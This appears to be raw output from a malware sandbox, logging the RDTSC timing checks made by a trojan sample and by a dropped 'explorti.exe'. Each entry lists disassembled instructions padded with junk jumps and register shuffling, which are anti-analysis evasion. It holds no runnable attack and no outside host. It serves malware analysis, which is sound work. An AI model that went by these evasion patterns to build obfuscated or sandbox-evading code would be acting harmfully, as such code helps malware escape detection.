Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E006F4 second address: 4E007C2 instructions: 0x00000000 rdtsc 0x00000002 mov si, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FABC90CD763h 0x00000011 and ecx, 0B7CEABEh 0x00000017 jmp 00007FABC90CD769h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FABC90CD760h 0x00000023 jmp 00007FABC90CD765h 0x00000028 popfd 0x00000029 popad 0x0000002a xchg eax, ecx 0x0000002b jmp 00007FABC90CD75Eh 0x00000030 push eax 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007FABC90CD761h 0x00000038 sbb ecx, 1A2C7106h 0x0000003e jmp 00007FABC90CD761h 0x00000043 popfd 0x00000044 popad 0x00000045 xchg eax, ecx 0x00000046 pushad 0x00000047 mov ah, 5Bh 0x00000049 mov dx, A7A8h 0x0000004d popad 0x0000004e mov eax, dword ptr [775165FCh] 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007FABC90CD769h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E007C2 second address: 4E007C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E007C8 second address: 4E00831 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 call 00007FABC90CD766h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test eax, eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FABC90CD75Ah 0x0000001a jmp 00007FABC90CD765h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FABC90CD760h 0x00000026 and cx, B9F8h 0x0000002b jmp 00007FABC90CD75Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E00831 second address: 4E008E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FAC3BB04D3Eh 0x0000000f jmp 00007FABC9471C2Eh 0x00000014 mov ecx, eax 0x00000016 pushad 0x00000017 push esi 0x00000018 movsx ebx, si 0x0000001b pop ecx 0x0000001c movsx ebx, cx 0x0000001f popad 0x00000020 xor eax, dword ptr [ebp+08h] 0x00000023 jmp 00007FABC9471C37h 0x00000028 and ecx, 1Fh 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FABC9471C34h 0x00000032 and ecx, 25FF3848h 0x00000038 jmp 00007FABC9471C2Bh 0x0000003d popfd 0x0000003e mov dx, ax 0x00000041 popad 0x00000042 ror eax, cl 0x00000044 jmp 00007FABC9471C32h 0x00000049 leave 0x0000004a pushad 0x0000004b jmp 00007FABC9471C2Dh 0x00000050 popad 0x00000051 retn 0004h 0x00000054 nop 0x00000055 mov esi, eax 0x00000057 lea eax, dword ptr [ebp-08h] 0x0000005a xor esi, dword ptr [00962014h] 0x00000060 push eax 0x00000061 push eax 0x00000062 push eax 0x00000063 lea eax, dword ptr [ebp-10h] 0x00000066 push eax 0x00000067 call 00007FABCD952514h 0x0000006c push FFFFFFFEh 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E008E6 second address: 4E008EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E008EA second address: 4E008FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E008FD second address: 4E00946 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b mov dx, ax 0x0000000e movzx esi, bx 0x00000011 popad 0x00000012 ret 0x00000013 nop 0x00000014 push eax 0x00000015 call 00007FABCD5AE083h 0x0000001a mov edi, edi 0x0000001c jmp 00007FABC90CD75Bh 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FABC90CD760h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E00946 second address: 4E0094A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E0094A second address: 4E00950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E00950 second address: 4E00997 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c movzx eax, di 0x0000000f popad 0x00000010 movsx edx, si 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007FABC9471C2Eh 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FABC9471C37h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0008 second address: 4DB000C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB000C second address: 4DB0012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD02DC second address: 4DD0315 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007FABC9471C33h 0x00000013 pop ecx 0x00000014 push edx 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0315 second address: 4DD031B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD031B second address: 4DD031F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD031F second address: 4DD0352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FABC90CD765h 0x00000012 jmp 00007FABC90CD760h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0352 second address: 4DD03B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FABC9471C31h 0x00000009 sbb eax, 4211DA06h 0x0000000f jmp 00007FABC9471C31h 0x00000014 popfd 0x00000015 call 00007FABC9471C30h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e call 00007FABC9471C29h 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 movzx ecx, di 0x00000029 call 00007FABC9471C2Fh 0x0000002e pop esi 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD03B3 second address: 4DD03BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD03BA second address: 4DD0483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a mov ch, 84h 0x0000000c pop ebx 0x0000000d call 00007FABC9471C34h 0x00000012 jmp 00007FABC9471C32h 0x00000017 pop esi 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d pushad 0x0000001e call 00007FABC9471C2Eh 0x00000023 pushad 0x00000024 popad 0x00000025 pop ecx 0x00000026 jmp 00007FABC9471C31h 0x0000002b popad 0x0000002c mov eax, dword ptr [eax] 0x0000002e jmp 00007FABC9471C31h 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 jmp 00007FABC9471C31h 0x0000003c pop eax 0x0000003d jmp 00007FABC9471C2Eh 0x00000042 push 015CA5D5h 0x00000047 pushad 0x00000048 call 00007FABC9471C37h 0x0000004d push esi 0x0000004e pop ebx 0x0000004f pop eax 0x00000050 mov bx, 26E8h 0x00000054 popad 0x00000055 add dword ptr [esp], 75EA082Bh 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f push esi 0x00000060 pop edi 0x00000061 mov dx, ax 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0483 second address: 4DD0503 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FABC90CD767h 0x00000009 sub cx, 8EDEh 0x0000000e jmp 00007FABC90CD769h 0x00000013 popfd 0x00000014 mov edi, eax 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr fs:[00000000h] 0x0000001f jmp 00007FABC90CD75Ah 0x00000024 nop 0x00000025 jmp 00007FABC90CD760h 0x0000002a push eax 0x0000002b pushad 0x0000002c push edx 0x0000002d jmp 00007FABC90CD75Ch 0x00000032 pop ecx 0x00000033 movsx edx, si 0x00000036 popad 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov ebx, 60A5895Ah 0x00000040 pushad 0x00000041 popad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0503 second address: 4DD0509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0651 second address: 4DD06BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FABC90CD75Ah 0x00000009 adc ecx, 0B2920F8h 0x0000000f jmp 00007FABC90CD75Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FABC90CD768h 0x0000001b sub ecx, 4F087B58h 0x00000021 jmp 00007FABC90CD75Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a xchg eax, edi 0x0000002b pushad 0x0000002c mov edx, eax 0x0000002e mov si, 5A07h 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FABC90CD75Fh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD06BC second address: 4DD06C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD06C2 second address: 4DD06D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC90CD75Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD06D1 second address: 4DD06F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dh, 64h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD06F8 second address: 4DD06FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD06FD second address: 4DD0703 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0703 second address: 4DD0707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0707 second address: 4DD0788 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [7751B370h] 0x00000010 jmp 00007FABC9471C2Eh 0x00000015 xor dword ptr [ebp-08h], eax 0x00000018 pushad 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FABC9471C2Ch 0x00000020 or ah, 00000008h 0x00000023 jmp 00007FABC9471C2Bh 0x00000028 popfd 0x00000029 push esi 0x0000002a pop ebx 0x0000002b popad 0x0000002c pushad 0x0000002d jmp 00007FABC9471C32h 0x00000032 mov ecx, 38DC0A81h 0x00000037 popad 0x00000038 popad 0x00000039 xor eax, ebp 0x0000003b pushad 0x0000003c mov edx, 481EC4FEh 0x00000041 mov di, 330Ah 0x00000045 popad 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FABC9471C2Dh 0x0000004e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0788 second address: 4DD078E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD078E second address: 4DD07E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007FABC9471C2Fh 0x00000010 lea eax, dword ptr [ebp-10h] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FABC9471C34h 0x0000001a sub ah, 00000058h 0x0000001d jmp 00007FABC9471C2Bh 0x00000022 popfd 0x00000023 mov di, si 0x00000026 popad 0x00000027 mov dword ptr fs:[00000000h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD07E0 second address: 4DD07E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD07E4 second address: 4DD07EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD07EA second address: 4DD0832 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD766h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007FABC90CD760h 0x00000011 mov eax, dword ptr [esi+10h] 0x00000014 jmp 00007FABC90CD760h 0x00000019 test eax, eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0832 second address: 4DD0836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0836 second address: 4DD083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD083A second address: 4DD0840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0840 second address: 4DD08DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FAC3B71CC22h 0x0000000f jmp 00007FABC90CD760h 0x00000014 sub eax, eax 0x00000016 jmp 00007FABC90CD761h 0x0000001b mov dword ptr [ebp-20h], eax 0x0000001e jmp 00007FABC90CD75Eh 0x00000023 mov ebx, dword ptr [esi] 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FABC90CD75Eh 0x0000002c add si, 0968h 0x00000031 jmp 00007FABC90CD75Bh 0x00000036 popfd 0x00000037 mov cx, 835Fh 0x0000003b popad 0x0000003c mov dword ptr [ebp-24h], ebx 0x0000003f jmp 00007FABC90CD762h 0x00000044 test ebx, ebx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 mov ax, dx 0x0000004c mov ch, dl 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD08DA second address: 4DD08EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC9471C2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD08EC second address: 4DD0927 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FAC3B71CAD6h 0x00000011 jmp 00007FABC90CD766h 0x00000016 cmp ebx, FFFFFFFFh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ebx, 567468A0h 0x00000021 mov esi, edx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0927 second address: 4DD093C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC9471C31h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD093C second address: 4DD027F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FAC3B71CA8Dh 0x0000000d jne 00007FABC90CD779h 0x0000000f xor ecx, ecx 0x00000011 mov dword ptr [esi], ecx 0x00000013 mov dword ptr [esi+04h], ecx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], ecx 0x0000001c mov dword ptr [esi+10h], ecx 0x0000001f mov dword ptr [esi+14h], ecx 0x00000022 mov ecx, dword ptr [ebp-10h] 0x00000025 mov dword ptr fs:[00000000h], ecx 0x0000002c pop ecx 0x0000002d pop edi 0x0000002e pop esi 0x0000002f pop ebx 0x00000030 mov esp, ebp 0x00000032 pop ebp 0x00000033 retn 0004h 0x00000036 nop 0x00000037 pop ebp 0x00000038 ret 0x00000039 add esi, 18h 0x0000003c pop ecx 0x0000003d cmp esi, 00965678h 0x00000043 jne 00007FABC90CD740h 0x00000045 push esi 0x00000046 call 00007FABC90CDFC3h 0x0000004b push ebp 0x0000004c mov ebp, esp 0x0000004e push dword ptr [ebp+08h] 0x00000051 call 00007FABCD580ABFh 0x00000056 mov edi, edi 0x00000058 jmp 00007FABC90CD75Eh 0x0000005d xchg eax, ebp 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FABC90CD767h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0CE4 second address: 4DC0CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dx, FB72h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov dl, ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0CF6 second address: 4DC0D01 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 mov ebx, esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0D01 second address: 4DC0D1E instructions: 0x00000000 rdtsc 0x00000002 mov ah, 44h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FABC9471C2Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0D1E second address: 4DC0D3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0D3B second address: 4DC0D57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0D57 second address: 4DC0D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FABC90CD769h 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: E8F20C second address: E8F213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1015517 second address: 1015544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007FABC90CD763h 0x0000000c js 00007FABC90CD756h 0x00000012 jmp 00007FABC90CD75Ch 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 10156A3 second address: 10156A8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 10156A8 second address: 10156AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1015823 second address: 101583E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FABC9471C2Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007FABC9471C2Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 10159F3 second address: 10159F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 10159F9 second address: 10159FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 10159FD second address: 1015A28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD766h 0x00000007 jng 00007FABC90CD756h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 ja 00007FABC90CD756h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019951 second address: 1019983 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FABC9471C28h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FABC9471C31h 0x00000018 jmp 00007FABC9471C2Dh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019983 second address: 10199AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD766h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FABC90CD75Ch 0x00000013 rdtsc
